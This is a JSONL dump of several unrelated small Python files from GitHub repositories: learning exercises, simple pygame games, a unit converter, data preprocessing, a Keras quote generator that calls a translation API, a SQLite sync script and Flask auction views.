task_two\n\nasyncio.run(main())","repo_name":"NikitaRadionov/asyncio_learning","sub_path":"12.py","file_name":"12.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"34066939492","text":"#!/usr/bin/env python\r\n\r\nimport pygame, sys\r\nfrom pygame.locals import *\r\n\r\nfrom screen import Screen\r\nfrom event import EventListener\r\nfrom scene import Scene\r\n\r\nWINDOW_WIDTH=1000\r\nWINDOW_HEIGHT=480\r\n\r\npygame.init()\r\n\r\nfpsClock = pygame.time.Clock()\r\n\r\nwindowSurfaceObj = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT), pygame.DOUBLEBUF)\r\npygame.display.set_caption(\"Street Pirates Vs. Ninja\")\r\n\r\nscene = Scene([ [100, 0, 100], [-100, 0, 0] ])\r\nscreen = Screen(windowSurfaceObj, scene)\r\nlistener = EventListener(scene)\r\n\r\nwhile True:\r\n    #print \"1\", scene._players[0].position()\r\n    #print \"2\", scene._players[1].position()\r\n    scene.update()\r\n    listener.listen()\r\n    screen.draw()\r\n    fpsClock.tick(30)\r\n\r\n","repo_name":"ClubEngine/GameJam4","sub_path":"dev/testsaut.py","file_name":"testsaut.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"32905854746","text":"import pandas as pd\nimport re\nimport numpy as np\nimport pkuseg\n\ndata = pd.read_csv('d://processed4news.tsv', sep='\\t', encoding='utf-8', index_col=False)\ndata.columns = ['label', 'content']\n\n#data.head(10)\n\n#%%\n \ndata['cut_words'] = ' '\nseg = pkuseg.pkuseg() # pkuseg automatically downloads the matching fine-grained domain model\nuncn2 = re.compile(u'[\\u4e00-\\u9fa5]+') # assumption: uncn2 was undefined in the original; a CJK-matching regex is the likely intent\nfor i in range(len(data)): \n    \n    cn = \"\".join(uncn2.findall(data['content'][i].lower())) # keep only the Chinese characters\n    cn=seg.cut(cn)\n    \n    data['cut_words'][i] = cn\n\n\n# In[9]:\n#data.head(10)\n#print(data['cut_words'][4])\n\n# In[10]:\n\n\n# split the data into train, validation and test sets\ntrain, val, test = np.split(data.sample(frac=1), [int(.6*len(data)), int(.8*len(data))])\n\n\n# In[11]:\n\n\n# save the data\ntest.to_csv('d://test.tsv', sep='\\t', encoding='utf-8', index=False)\ntrain.to_csv('d://train.tsv', sep='\\t', encoding='utf-8', index=False)\nval.to_csv('d://dev.tsv', sep='\\t', encoding='utf-8', index=False)\n\n\n## In[12]:\n#\n#\n## check the label distribution\n#data.groupby(['label']).count()\n#\n#\n## In[43]:\n#\n#\n#data['cut_words_count'] = data['cut_words'].apply(lambda x: len(x.split()))\n#\n#\n## In[49]:\n#\n#\n#data.describe()\n#\n#\n## In[50]:\n#\n#\n#data.head()\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n#google_translate_EtoC(words['content'][519])\n#words['content'][519]\n\n\n# In[57]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"wyhwhy/text-classification","sub_path":"data preprocessing/google translate+Chinese pkuseg word segmentation/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"6601816178","text":"from time import sleep\n\nwizard = {\n    'name': 'Wizard',\n    'hp': 70,\n    'damage': 150,\n    'killMessage': 'decimates the dragon with masterful use of the arcane.',\n    'damageType': 'magic'\n}\nelf = {\n    'name': 'Elf',\n    'hp': 100,\n    'damage': 100,\n    'killMessage': 'aims carefully, and with the skill of a master marksman, fells the dragon with shots aimed true.',\n    'damageType': 'piercing'\n}\nhuman = {\n    'name': 'Human',\n    'hp': 150,\n    'damage': 20,\n    'killMessage': 'slays the dragon through sheer will and unwavering bravery, with a mighty blow of the sword.',\n    'damageType': 
'bludgeoning'\n}\n\ndragon = {\n    'name': 'Dragon',\n    'hp': 300,\n    'damage': 50,\n    'killMessage': 'into a pile of soot and ash, and lives to kill another day.',\n    'damageType': 'slashing and fire'\n}\n\norc = {\n    'name': 'Orc',\n    'hp': 300,\n    'damage': 51,\n    'killMessage': \"arcs their axe with the force of their ancestors behind them, and the dragon's head is parted from its body.\",\n    'damageType': 'slashing'\n}\n\n\n# function to simulate the fight\ndef fight(player, char):\n    playerDamage = char[\"damage\"]\n    playerHp = char[\"hp\"]\n    enemyDamage = dragon['damage']\n    enemyHp = dragon['hp']\n\n    while True:\n        enemyHp -= playerDamage\n        print(\n            f'\\n{player} damaged the dragon for {playerDamage} {char[\"damageType\"]} damage!')\n        print(f'The dragon has {enemyHp} remaining health.')\n        sleep(2.5)\n        if enemyHp <= 0:\n            print(f'\\n{player} {char[\"killMessage\"]}')\n            break\n\n        playerHp -= enemyDamage\n        print(\n            f'\\nThe dragon attacks {player} for {enemyDamage} {dragon[\"damageType\"]} damage!')\n        print(f'{player} has {playerHp} remaining health.')\n        sleep(2.5)\n        if playerHp <= 0:\n            print(f'\\nThe dragon torches {player} {dragon[\"killMessage\"]}')\n            break\n\n\n# function to input a non empty character name\ndef nameChar(character):\n    while character != '5' and character != 'exit':\n        playerName = input(\n            f'Please enter the name of your {character[\"name\"].lower()}: ')\n        playerName = playerName.capitalize()\n        if playerName != '':\n            break\n        else:\n            print(\"Please enter a name!\")\n    return playerName\n\n\ndef startGame():\n    print('Here are the following heroes of Exandria:')\n    print('1) Wizard')\n    print('2) Elf')\n    print('3) Human')\n    print('4) Orc')\n    print('5) Exit the Game')\n    character = input(\"Enter your choice of character or exit the game:\")\n    return character.lower()\n","repo_name":"DChase-Cad/python","sub_path":"1-Fundamentals/resources.py","file_name":"resources.py","file_ext":"py","file_size_in_byte":2603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31861045347","text":"#-*-coding:utf-8-*-\n\n'''Learn how to read and write data in Excel files, using the xlrd, xlwt and xlutils modules'''\nimport xlrd,xlwt\n\nfrom xlutils.copy import copy\n\nfont = xlwt.easyxf('font:color-index red ,bold on')\nheaderStyle = font\noldwb = xlrd.open_workbook('erpdata1.xls',formatting_info=True) # keep the original Excel document's formatting intact\nnewwb = copy(oldwb) # copy() clones the opened xlrd Book object into a new xlwt Workbook\nnewws = newwb.get_sheet(2) # use get_sheet to obtain the corresponding sheet\nnewws.write(1,6,'通过'.decode('gbk')) # write new data; note that the Chinese text must be decoded here\n# after writing is finished, the workbook must be saved\nnewwb.save('erpdata1.xls')\n","repo_name":"chuju320/Lianxi","sub_path":"lianxi/excel.py","file_name":"excel.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11751194412","text":"#creates a new string, that will store the character you have written\nimport pygame\nimport time\n\npygame.init()\n\nscreen_width = 1600\nscreen_height = 800\n\nwhite = (255,255,255)\nblack = (0,0,0)\n\nscreen = pygame.display.set_mode((screen_width,screen_height)) \n\npygame.display.set_caption(\"Type Attack\")\nclock = pygame.time.Clock()\n\nnumber_str = \"\" \n\n#create a new Font object that is used to render the string into a Surface object\nfont_renderer = pygame.font.Font(\"freesansbold.ttf\", 15) \n\nwhile True:\n    screen.fill(black)  # fill the whole screen with a black color\n    # create a new Surface object from a string, where the text is white.\n    rendered_number = font_renderer.render(number_str, 
True, white)\n\n #draws the created Surface onto the screen at position 100,100\n screen.blit(rendered_number, (100, 100))\n # updates the screen to show changes\n pygame.display.flip()\n\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN: \n if pygame.K_a <= event.key <= pygame.K_z: # checks the key pressed\n character = chr(event.key) #converts the number to a character\n number_str += str(character) #adds the number to the end of the string\n","repo_name":"jackkleeman/TypeAttack","sub_path":"real time writing.py","file_name":"real time writing.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"13992790169","text":"from decimal import Decimal, getcontext\n\nfrom unitconverter.exceptions import CategoryError, UnitError\nfrom unitconverter.formatting import parse_decimal\nfrom unitconverter.parser import parse_unit\nfrom unitconverter.registry import get_category\nfrom unitconverter.unit import Unit\n\n\n# Set decimal precision\ngetcontext().prec = 15\n\n\ndef convert(value: Decimal | int | str, source: Unit | str, dest: Unit | str) -> Decimal:\n \"\"\" Convert value from source unit to destination unit.\n\n Parameters\n ----------\n value : Decimal | int | str\n value to convert\n\n source : Unit | str\n source unit or name\n\n dest : Unit | str\n destination unit or name\n\n Returns\n -------\n Decimal\n result of the conversion\n\n Raises\n ------\n UnitError\n the source or dest unit is invalid\n\n CategoryError\n the units are not compatible\n \"\"\"\n value = parse_decimal(value)\n source = parse_unit(source)\n dest = parse_unit(dest)\n\n source_category = get_category(source)\n dest_category = get_category(dest)\n\n if not compatible_units(source_category, dest_category):\n raise CategoryError(f'Category mismatch: {source.name} ({source_category})'\n f' and {dest.name} ({dest_category})')\n\n # Fuel conversion\n if source_category in FUEL_CATEGORY:\n return convert_fuel(value, source, dest)\n\n # Temperature conversion\n elif source_category == 'temperature':\n return convert_temperature(value, source, dest)\n\n # Regular conversion\n value = value * source.factor\n return value / dest.factor\n\n\ndef convert_temperature(value: Decimal, source: Unit, dest: Unit) -> Decimal:\n \"\"\" Convert temperature units. \"\"\"\n value = parse_decimal(value)\n source = parse_unit(source)\n dest = parse_unit(dest)\n\n # Convert from source to kelvin\n if source.name.endswith('kelvin'):\n value = value * source.factor\n elif source.name == 'celsius':\n value = value + Decimal('273.15')\n elif source.name == 'fahrenheit':\n value = (value + Decimal('459.67')) * Decimal(5) / Decimal(9)\n elif source.name == 'rankine':\n value = value * Decimal(5) / Decimal(9)\n else:\n raise UnitError(f'Invalid temperature unit: {source.name}')\n\n # Convert from kelvin to dest\n if dest.name.endswith('kelvin'):\n return value / dest.factor\n elif dest.name == 'celsius':\n return value - Decimal('273.15')\n elif dest.name == 'fahrenheit':\n return value * Decimal(9) / Decimal(5) - Decimal('459.67')\n elif dest.name == 'rankine':\n return value * Decimal(9) / Decimal(5)\n else:\n raise UnitError(f'Invalid temperature unit: {dest.name}')\n\n\ndef convert_fuel(value: Decimal, source: Unit, dest: Unit) -> Decimal:\n \"\"\" Convert between fuel economy and fuel consumption units. 
\"\"\"\n value = parse_decimal(value)\n source = parse_unit(source)\n dest = parse_unit(dest)\n\n if source.dimension not in FUEL_CATEGORY:\n raise UnitError(f'Invalid fuel unit: {source}')\n\n if dest.dimension not in FUEL_CATEGORY:\n raise UnitError(f'Invalid fuel unit: {dest}')\n\n # Invert fuel consumption (litre/metre) and fuel economy (metre/litre)\n if source.dimension != dest.dimension:\n value = 1 / (value * source.factor)\n return value / dest.factor\n\n # Convert fuel units normally\n value = value * source.factor\n return value / dest.factor\n\n\ndef compatible_units(source_category: str, dest_category: str) -> bool:\n \"\"\" Returns True if the unit categories are compatible. \"\"\"\n if source_category == dest_category:\n return True\n elif source_category in FUEL_CATEGORY and dest_category in FUEL_CATEGORY:\n return True\n return False\n\n\n# Compatible fuel categories\nFUEL_CATEGORY = ('fuel economy', 'fuel consumption')\n","repo_name":"Emetophobe/unitconverter","sub_path":"unitconverter/converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":3861,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"18607455646","text":"import json\nimport os\nimport random\nfrom typing import List\n\nimport gensim\nfrom fuzzywuzzy import process, fuzz\nimport keras\nimport numpy as np\nimport requests\n\n\n\ndef searcher(q: str, full_text: List[str], cutoff=85) -> List[str]:\n def custom_ratio(s1, s2):\n fratio = fuzz.UWRatio(s1, s2)\n if s1[0].lower() != s2[0].lower():\n fratio -= 25\n else:\n fratio += 10\n return fratio\n\n quotes_indices = []\n\n for i, sent in enumerate(full_text):\n try:\n if process.extractBests(q, filter(lambda x: abs(len(q)-len(x)) < 2 and len(x) > 2, sent.split()),\n score_cutoff=cutoff, scorer=custom_ratio):\n quotes_indices.append(i)\n except IndexError:\n continue\n\n return quotes_indices\n\n\ndef ending_decider(l: int, word_no_ending: str) -> str:\n ten_reminder = l % 10\n if ten_reminder == 1 and l != 11:\n return word_no_ending + 'у'\n elif ten_reminder in {2, 3, 4} and l not in {12, 13, 14}:\n return word_no_ending + 'ы'\n else:\n return word_no_ending\n\n\nclass QuotesModel:\n def __init__(self):\n self.model = keras.models.load_model('good_model.h5')\n self.word_model = gensim.models.Word2Vec.load('w2v.model')\n self.vars = json.loads(open('variables.json', 'r').read())\n\n def word2idx(self, word):\n return self.word_model.wv.key_to_index[word]\n\n def idx2word(self, idx):\n return self.word_model.wv.index_to_key[idx]\n\n def sample(self, predictions, temperature=0.75):\n if temperature <= 0:\n return np.argmax(predictions)\n predictions = np.asarray(predictions).astype('float64')\n predictions = np.log(predictions) / temperature\n exp_predictions = np.exp(predictions)\n predictions = exp_predictions / np.sum(exp_predictions)\n probas = np.random.multinomial(1, predictions, 1)\n\n return np.argmax(probas)\n\n def generate_next(self, num_generated=10, temp=0.75) -> str:\n text = random.choice(self.vars['beginings'])\n word_idxs = [self.word2idx(word) for word in text.lower().split()]\n\n for _ in range(num_generated):\n prediction = self.model.predict(x=np.array(word_idxs))\n idx = self.sample(prediction[-1], temperature=temp)\n word_idxs.append(idx)\n\n return ' '.join(self.idx2word(idx) for idx in word_idxs)\n\n def translate_generated(self, t: float, words: int, folder_id: str = os.getenv('FOLDER_ID', \"b1geh42nvb0dfevai47f\"),\n texts: list = [], targetLanguageCode: str = 
\"ru\") -> str:\n body = {\n \"folder_id\": folder_id,\n \"texts\": texts if texts\n else [self.generate_next(temp=t, num_generated=words) for _ in range(5)],\n \"targetLanguageCode\": targetLanguageCode\n }\n\n headers = {\n \"Content-Type\": \"application/json\",\n \"Authorization\": f\"API-Key {os.getenv('YA_TOKEN')}\"\n }\n\n resp = requests.post(\"https://translate.api.cloud.yandex.net/translate/v2/translate\",\n data=str(body), headers=headers)\n\n if resp.ok:\n for i in resp.json()['translations']:\n if ',' in i['text']:\n return (200, i['text'])\n return (200, i['text'])\n else:\n return (400, resp.json()['message'])\n","repo_name":"WannaFight/slepaya-bot","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40542086914","text":"import gs\r\nimport logging\r\nimport sqlite3\r\nimport sys\r\nimport time\r\nimport ws_client\r\n\r\ndef handle_unhandled_exceptions(exc_type, exc_value, exc_traceback):\r\n if issubclass(exc_type, KeyboardInterrupt):\r\n sys.__excepthook__(exc_type, exc_value, exc_traceback)\r\n return\r\n for _ in range(100):\r\n try:\r\n ws_client.main()\r\n except:\r\n continue\r\n else:\r\n break\r\n logging.critical('Unhandled exception', exc_info=(exc_type, exc_value, exc_traceback))\r\n logging.info('END')\r\n\r\ndef main():\r\n now = time.localtime()\r\n year = now.tm_year\r\n month = now.tm_mon\r\n day = now.tm_mday\r\n\r\n logging.basicConfig(filename=f'logs/{year}_{month}_{day}_update_db.log',\r\n level=logging.DEBUG,\r\n format='%(asctime)s - [%(levelname)s] %(message)s',\r\n datefmt='%Y/%m/%d %H:%M:%S')\r\n\r\n sys.excepthook = handle_unhandled_exceptions\r\n\r\n logging.info('START')\r\n\r\n gs_data = gs.get_data()\r\n\r\n DATABASE = 'access.db'\r\n con = sqlite3.connect(DATABASE)\r\n con.execute('PRAGMA foreign_keys = ON')\r\n cur = con.cursor()\r\n\r\n query = 'SELECT * FROM users'\r\n cur.execute(query)\r\n res = cur.fetchall()\r\n db_users = {\r\n 'ids': [],\r\n 'names': []\r\n }\r\n for row in res:\r\n db_users['ids'].append(row[0])\r\n db_users['names'].append(row[1])\r\n\r\n query = \"\"\" SELECT codes.code, codes.user_id, users.name FROM codes\r\n INNER JOIN users ON codes.user_id = users.id \"\"\"\r\n cur.execute(query)\r\n res = cur.fetchall()\r\n db_codes = {\r\n 'codes': [],\r\n 'users_ids': [],\r\n 'users_names': []\r\n }\r\n for row in res:\r\n db_codes['codes'].append(row[0])\r\n db_codes['users_ids'].append(row[1])\r\n db_codes['users_names'].append(row[2])\r\n\r\n new_names = []\r\n for gs_name in gs_data['names']:\r\n if gs_name not in db_users['names']:\r\n new_names.append((gs_name,))\r\n if new_names:\r\n query = 'INSERT INTO users(name) VALUES (?)'\r\n cur.executemany(query, new_names)\r\n con.commit()\r\n\r\n diff_codes = []\r\n new_codes = []\r\n for gs_code, gs_name in zip(gs_data['codes'], gs_data['names']):\r\n if gs_code not in db_codes['codes']:\r\n new_codes.append((gs_code, gs_name))\r\n else:\r\n db_code_index = db_codes['codes'].index(gs_code)\r\n if gs_name != db_codes['users_names'][db_code_index]:\r\n diff_codes.append((gs_name, gs_code))\r\n\r\n if diff_codes:\r\n query = \"\"\" UPDATE codes SET user_id = users.id\r\n FROM (SELECT id FROM users WHERE name = ?) AS users WHERE code = ? 
\"\"\"\r\n cur.executemany(query, diff_codes)\r\n con.commit()\r\n\r\n if new_codes:\r\n query = 'INSERT INTO codes(code, user_id) SELECT ?, users.id FROM users WHERE name = ?'\r\n cur.executemany(query, new_codes)\r\n con.commit()\r\n\r\n old_codes = []\r\n for db_code in db_codes['codes']:\r\n if db_code not in gs_data['codes']:\r\n old_codes.append((db_code,))\r\n\r\n if old_codes:\r\n query = 'DELETE FROM codes WHERE code = ?'\r\n cur.executemany(query, old_codes)\r\n con.commit()\r\n\r\n ws_client.main()\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"NicoCassio/siemb_project","sub_path":"update_db.py","file_name":"update_db.py","file_ext":"py","file_size_in_byte":3349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"36702402392","text":"from flask import Blueprint, render_template, request, session\nfrom .models import Item, Gemstone, Metal, Bid\nfrom .forms import ItemForm\nfrom . import db\n\n\ndef get_item():\n item = Item(\"Gold Amber Ring\", \"https://i.pinimg.com/474x/b0/dc/40/b0dc40f5a5bc0ae02e2ba0dafe7926de.jpg\",\n \"Talisa\", \"Ring\", \"MaryP\", 1, 2, 1992, \"$120.00\", \"$230.35\", \"3.5cm\", \"15g\", \"Good\", \"Worn twice to parties\")\n gem = Gemstone(\"Amber\", \"Gold Amber Ring\", 1, \"Rectangle\",\n \"Orange\", \"2cm\", \"1cm\", \"0.5cm\", \"5g\")\n gem2 = Gemstone(\"Amber\", \"Gold Amber Ring\", 2, \"Teardrop\",\n \"Orange\", \"0.5cm\", \"0.8cm\", \"0.5cm\", \"3g\")\n metal = Metal(\"Gold\", \"Gold Amber Ring\", \"Gold\",\n \"14k\", \"copper\", \"3.5cm\", \"1cm\", \"4g\")\n bid = Bid(\"nyne03\", \"Amber Pendant\", \"$144\", \"5/10/2020\")\n bid1 = Bid(\"Starlight28\", \"Amber Pendant\", \"$150\", \"8/10/2020\")\n bid2 = Bid(\"nyne03\", \"Amber Pendant\", \"$145\", \"12/10/2020\")\n item.set_items(item)\n item.set_gems(gem)\n item.set_gems(gem2)\n item.set_metals(metal)\n item.set_bids(bid)\n item.set_bids(bid1)\n item.set_bids(bid2)\n item1 = Item(\"Round Diamond Earrings\", \"https://dl.airtable.com/.attachments/c408c402b19d6d876560736bd9b85f68/2dd7dd7f/RoundDiamondEarrings.jpg\",\n \"Cartier\", \"Earrings\", \"cookieMonster789\", 1, 2, \"2016\", \"$330\", \"$299.00\", \"24mm\", \"12g\", \"Excellent\", \"Never worn. 
Perfect for functions.\")\n gem3 = Gemstone(\"Diamond\", \"Round Diamond Earrings\", 2,\n \"White\", \"Circle\", \"0.4cm\", \"0.4cm\", \"0.25cm\", \"4g\")\n metal1 = Metal(\"Sterling silver\", \"Round Diamond Earrings\",\n \"Silver\", 0, \"Silver\", \"12cm\", \"44mm\", \"10g\")\n item.set_items(item1)\n item1.set_gems(gem3)\n item1.set_metals(metal1)\n item2 = Item(\"Sapphire Crystal Ring\", \"https://dl.airtable.com/.attachments/5ed715bb5470acaf07fa8c3439c3de3d/949ebaab/SilverSapphireRing.jpg\",\n \"Wallace Bishop\", \"Ring\", \"cookieMonster789\", 1, 2, 2009, \"$287\", \"$311.50\", \"3cm\", \"50g\", \"Very Good\", \"Super sparkly, real crystals\")\n gem4 = Gemstone(\"Sapphire\", \"Sapphire Crystal Ring\", 1,\n \"Dark Blue\", \"Circle\", \"0.5cm\", \"0.5cm\", \"0.5cm\", \"4.5g\")\n gem5 = Gemstone(\"Crystal\", \"Sapphire Crystal Ring\", 24,\n \"White\", \"Circle\", \"1.5mm\", \"1.5mm\", \"1.5mm\", \"1g\")\n item.set_items(item2)\n item2.set_gems(gem4)\n item2.set_gems(gem5)\n item2.set_metals(metal1)\n item3 = Item(\"Silver Diamond Ring\", \"https://dl.airtable.com/.attachments/6548906181af2d117a18ce634b5d69df/d86a2199/SilverDiamondRing.jpg\",\n \"Tiffany & Co\", \"Ring\",\t\"Starlight28\", 1, 1, 2000, \"$239\", \"$264.00\", \"2.5cm\", \"32g\", \"Good\", \"Thin metal, small diamond\")\n gem6 = Gemstone(\"Diamond\", \"Silver Diamond Ring\", 1,\n \"White\", \"Circle\", \"2cm\", \"2cm\", \"1cm\", \"6g\")\n item.set_items(item3)\n item3.set_gems(gem6)\n item3.set_metals(metal1)\n item4 = Item(\"Gold Crystal Joint Bracelet\",\t\"https://dl.airtable.com/.attachments/e2656e7e37902f2ba1c0615544db0893/0a779932/GoldJointBracelet.jpg\",\n \"Cartier\", \"Bracelet\", \"CaseyLM\", 1, 2, 2014, \"$345\", \"$299.00\", \"7.8cm\", \"18g\", \"Very Good\", \"Worn 3 times\")\n gem7 = Gemstone(\"Amber\", \"Gold Crystal Joint Bracelet\",\t8,\n \"Orange\", \"Square\", \"1cm\", \"1cm\", \"0.5cm\", \"3g\")\n gem8 = Gemstone(\"Crystal\", \"Gold Crystal Joint Bracelet\", 5,\n \"White\", \"Circle\", \"4mm\", \"4mm\", \"4mm\", \"1g\")\n item.set_items(item4)\n item4.set_gems(gem7)\n item4.set_gems(gem8)\n item4.set_metals(metal)\n item5 = Item(\"Gold Drop Earrings\", \"https://dl.airtable.com/.attachments/85c26a6c8caf1e3a78d2fa59b0cc7b7b/db06debd/GoldDropEarrings.jpg\",\n \"Prouds\",\t\"Earrings\",\t\"MaryP\", 1, 0, 1998, \"$98\", \"$75.90\", \"2.4cm\", \"9g\", \"Good\", \"Long and dangly\")\n item.set_items(item5)\n item5.set_metals(metal)\n item6 = Item(\"Silver Rose Quartz Earrings\",\t\"https://dl.airtable.com/.attachments/dc5cfb44aa36648ceecc9135670cd926/c13c2be6/SilverRoseEarrings.jpg\",\n \"Michael Hill\", \"Earrings\", \"nyne03\", 1, 1, 2003, \"$120\", \"$94.50\", \"1.4cm\", \"5g\",\t\"Fair\", \"Very pretty, shines in the light\")\n gem9 = Gemstone(\"Rose Quartz\", \"Silver Rose Quartz Earrings\",\n 2, \"Pink\", \"Other Shape\", \"2cm\", \"2.4cm\", \"3mm\", \"2.2g\")\n item.set_items(item6)\n item6.set_gems(gem9)\n item6.set_metals(metal1)\n item7 = Item(\"Silver Geometric Pendant\", \"https://dl.airtable.com/.attachments/136d02d4e0500cd257838351dc9927e0/855cc15a/SilverGeometricPendant.jpg\",\n \"Pandora\", \"Pendant\", \"yyr84\", 1, 0, 1996, \"$99\", \"$108.95\", \"30cm\", \"14g\", \"Fair\", \"Very light to wear\")\n item.set_items(item7)\n item7.set_metals(metal1)\n item8 = Item(\"Amber Flower Earrings\", \"https://dl.airtable.com/.attachments/199e360752c5b82fddffff00e23e9645/0cc685a5/AmberFlowerEarrings.jpg\",\n \"Bvlgari\", \"Earrings\", \"Starlight28\", 1, 2, 1994, \"$124\", \"$102.00\", \"2cm\", \"15g\", 
\"Very Good\", \"Amazing!! 10/10. My daughter loved it\")\n gem10 = Gemstone(\"Amber\", \"Amber Flower Earrings\", 2,\n \"Orange\", \"Circle\", \"1.5cm\", \"1.5cm\", \"1cm\", \"4g\")\n gem11 = Gemstone(\"Amber\", \"Amber Flower Earrings\", 10,\n \"Orange\", \"Other Shape\", \"2.15cm\", \"1cm\", \"1cm\", \"4.5g\")\n item.set_items(item8)\n item8.set_gems(gem10)\n item8.set_gems(gem11)\n item8.set_metals(metal1)\n item9 = Item(\"Amethyst Flower Ring\", \"https://dl.airtable.com/.attachments/d1854ca617034993922ffc327a3f55b5/6a9934bf/GoldAmethystFlowerRing.jpg\",\n \"Dior\", \"Ring\", \"JamTam\", 1, 2, 2008, \"$420\", \"$250.90\", \"3.2cm\", \"27g\", \"Excellent\", \"Worn once, slightly heavy\")\n gem12 = Gemstone(\"Amethyst\", \"Amethyst Flower Ring\", 6,\n \"Purple\", \"Circle\", \"1.5cm\", \"1.5cm\", \"1cm\", \"4g\")\n gem13 = Gemstone(\"Pink Topaz\", \"Amethyst Flower Ring\", 4,\n \"Dark Pink\", \"Circle\", \"1cm\", \"1cm\", \"1cm\", \"3g\")\n item.set_items(item9)\n item9.set_gems(gem12)\n item9.set_gems(gem13)\n item9.set_metals(metal)\n item10 = Item(\"Rose Gold Butterfly Bracelet\", \"https://dl.airtable.com/.attachments/ace4cc960edd1bbb3ceddf54e8a0a080/17c5feb3/RoseGoldButterfly.jpg\", \"Tiffany & Co\",\n \"Bracelet\", \"LucyGooseyy\", 1,\t2, 2012, \"$225\", \"$294.50\",\t\"6.8cm\", \"19g\",\t\"Good\", \"Many of my friends complimented this bracelet whenever I wore it\")\n gem14 = Gemstone(\"Crystal\", \"Rose Gold Butterfly Bracelet\",\n 36, \"White\", \"Circle\", \"2mm\", \"2mm\", \"2mm\", \"0.5g\")\n gem15 = Gemstone(\"Peach Sapphire\", \"Rose Gold Butterfly Bracelet\",\n 1, \"Light Peach\", \"Oval\", \"2.5cm\", \"1cm\", \"1cm\", \"3.5g\")\n metal2 = Metal(\"Rose Gold\", \"Rose Gold Butterfly Bracelet\",\n \"Rose gold\", \"8k\", \"Copper\", \"12cm\", \"3mm\", \"22g\")\n item.set_items(item10)\n item10.set_gems(gem14)\n item10.set_gems(gem15)\n item10.set_metals(metal2)\n item11 = Item(\"Gold Triangular Earrings\", \"https://dl.airtable.com/.attachments/b9d21ac9445a677618d71f0a42efad56/c67d86ad/GoldTriangularEarrings.jpg\",\n \"Goldmark\", \"Earrings\", \"cookieMonster789\", 1, 0, 2017, \"$87\", \"$84.99\", \"0.7cm\", \"8g\", \"Fair\", \"Simple, but makes a statement\")\n item.set_items(item11)\n item11.set_metals(metal)\n return item\n\n\nbp = Blueprint('main', __name__)\n\n\n@bp.route('/')\ndef show():\n item = get_item()\n # item = Item.query.filter_by(ItemNo=id).first()\n return render_template('index/show.html', item=item)\n\n\n@bp.route('/watchlist/')\ndef watchlist(id):\n item = get_item()\n return render_template('watchlist/show.html', item=item)\n\n\n@bp.route('/item_details/')\ndef item_details(id):\n item = Item.query.filter_by(ItemNo=id).first()\n # item = get_item()\n return render_template('item_details/show.html', item=item)\n\n\n@bp.route('/list_item', methods=['GET', 'POST'])\ndef list_item():\n print('Method Type: ', request.method)\n form = ItemForm()\n if form.validate_on_submit():\n print('Item submitted')\n\n name = form.itemName.data\n pic = form.itemPicture.data\n brand = form.itemBrand.data\n itemtype = form.itemType.data\n metalamount = form.itemMetals.data\n gemamount = form.itemGemAmount.data\n year = form.itemYear.data\n starting = form.itemStartingPrice.data\n original = form.itemValuePrice.data\n size = form.itemSize.data\n weight = form.itemWeight.data\n cond = form.itemCondition.data\n desc = form.itemDescription.data\n\n # create new item in session\n new_item = Item(ItemName=name, Picture=pic, Brand=brand, ItemType=itemtype, MetalAmount=metalamount, 
GemAmount=gemamount, YrCreated=year, StartingPrice=starting, OriginalPrice=original, Size=size, Weight=weight, Condition=cond, Description=desc)\n db.session.add(new_item)\n\n # commit to db\n db.session.commit()\n return ''\n\n return render_template('list_item/show.html', form=form)\n\n\n@bp.route('/login', methods=['GET', 'POST'])\ndef login():\n session['email'] = request.values.get('email')\n return render_template('login.html')\n\n\n@bp.route('/logout')\ndef logout():\n if 'email' in session:\n session.pop('email', None)\n","repo_name":"Antifact/assignment3","sub_path":"auction/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"22135476732","text":"import pathlib\nimport re\nimport pdb\nimport unittest\n\"\"\"\n Two types of files: text and binary\n file opening modes: r: read only; w: write only; a: append; b: binary; t:text; rb: default mode; r+: both reading and writing; w+: both reading and writing;a+: both appending and reading\n Regular Expressions:\n - [abc]: a set of characters you wish to match (a or b or c) examples: [a-c]:a or b or c; [0-38]: 0 or 1 or 2 or 3 or 8; [^abc]: any character except a or b or c\n - 'a..c': any two character between a and c (like abbc) examples: 'a.*b': any match starting with a and ending with b;\n - ^ma*n$: start with m and end with n\n - +: one or more occurrences\n - ?: zero or one occurrences\n - ab{2,4}c: at least 2 b, at most 4 b (like abbbc) examples: [0-9]{3}-[0-9]{7}: a phone number like 555-3123121\n - a|b: alternation (or operator)(includes a or b or both)\n - (): group sub-patterns examples: (a|b|c)xz: abxz, axz, cabxzsa\n python re functions: findall: return a list of matches; split: split by regex; sub: like replace in strings; search: first occurrence is returned as match object\n debugging with pdb: p: print value e.g: p __file__; n (next, like stay local): execute until next line and stay in current function; s(step, like step into): execute current line and stop in different function(if there is) \n ll: long list, list content of all function; l: print 11 line around current line(also l .); c: continue till next breakpoint; b(reak): set breakpoints; unt: execute until line number is smaller than current(or given) one \n display/undisplay: to watch 